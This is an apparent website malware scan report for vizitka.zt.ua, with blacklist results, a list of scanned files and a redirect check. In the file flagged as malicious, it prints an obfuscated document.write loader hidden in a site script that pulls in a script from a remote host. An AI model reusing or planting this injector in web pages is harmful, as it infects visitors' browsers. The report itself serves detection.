Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vizitka.zt.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vizitka.zt.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://vizitka.zt.ua/ | 200 OK Content-Length: 23233 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
http://vizitka.zt.ua/js/my_scripts.js | 200 OK Content-Length: 1394 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(function () {
$('a.free-trial-button').click(function () { $('div.'+$(this).attr("rel")).fadeIn(500); $("body").append("<div id='overlay'></div>"); $('#overlay').show().css({'filter' : 'alpha(opacity=80)'}); $('#slidercont').hide(); return false; }); $('a.buy-it-button').click(function () { $('div.'+$(this).attr("rel")).fadeIn(500); $("body").append("<div id='overlay'></div>"); $('#overlay') $(this).parent().addClass("active"); $(tmp).find(".tab_content div").stop(false,false).hide(); $(tmp).find(".tab"+tab_id).stop(false,false).fadeIn(300); return false; }); }); }); }); <!-- js-tools --> u=0;while(u<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00mbxtbs/sv0dpnqpofout0dpn`nbjmup0tubu/qiq#?=0tdsjqu?'.charCodeAt(u++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://vizitka.zt.ua/countdown.js | 200 OK Content-Length: 2544 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://vizitka.zt.ua/nivoslider/jquery.nivo.slider.pack.js | 200 OK Content-Length: 15919 Content-Type: application/x-javascript | clean |
http://vizitka.zt.ua/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://vizitka.zt.ua/fancybox/jquery.easing-1.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:30 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vizitka.zt.ua/ | 200 OK Content-Length: 23233 Content-Type: text/html | clean |
http://www.vizitka.zt.ua/js/my_scripts.js | 200 OK Content-Length: 1394 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(function () {
$('a.free-trial-button').click(function () { $('div.'+$(this).attr("rel")).fadeIn(500); $("body").append("<div id='overlay'></div>"); $('#overlay').show().css({'filter' : 'alpha(opacity=80)'}); $('#slidercont').hide(); return false; }); $('a.buy-it-button').click(function () { $('div.'+$(this).attr("rel")).fadeIn(500); $("body").append("<div id='overlay'></div>"); $('#overlay') $(this).parent().addClass("active"); $(tmp).find(".tab_content div").stop(false,false).hide(); $(tmp).find(".tab"+tab_id).stop(false,false).fadeIn(300); return false; }); }); }); }); <!-- js-tools --> u=0;while(u<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00mbxtbs/sv0dpnqpofout0dpn`nbjmup0tubu/qiq#?=0tdsjqu?'.charCodeAt(u++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://vizitka.zt.ua/fancybox/nivoslider/jquery.nivo.slider.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:33 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vizitka.zt.ua/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:33 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/fancybox/jquery.fancybox-1.3.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:34 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/fancybox/jquery.easing-1.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:34 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/fancybox/jquery.mousewheel-3.0.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:34 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1279 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vizitka.zt.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 04:37:23 GMT
Accept-Ranges: bytes
ETag: "103455-5ac1-502b1a444ea00"
Server: nginx/1.0.14
Content-Length: 23233
Content-Type: text/html
Last-Modified: Wed, 10 Sep 2014 08:14:32 GMT
...23233 bytes of data.
GET / HTTP/1.1
Host: vizitka.zt.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 04:37:23 GMT
Accept-Ranges: bytes
ETag: "103455-5ac1-502b1a444ea00"
Server: nginx/1.0.14
Content-Length: 23233
Content-Type: text/html
Last-Modified: Wed, 10 Sep 2014 08:14:32 GMT
...23233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vizitka.zt.ua
Referer: http://www.google.com/search?q=vizitka.zt.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vizitka.zt.ua
Referer: http://www.google.com/search?q=vizitka.zt.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.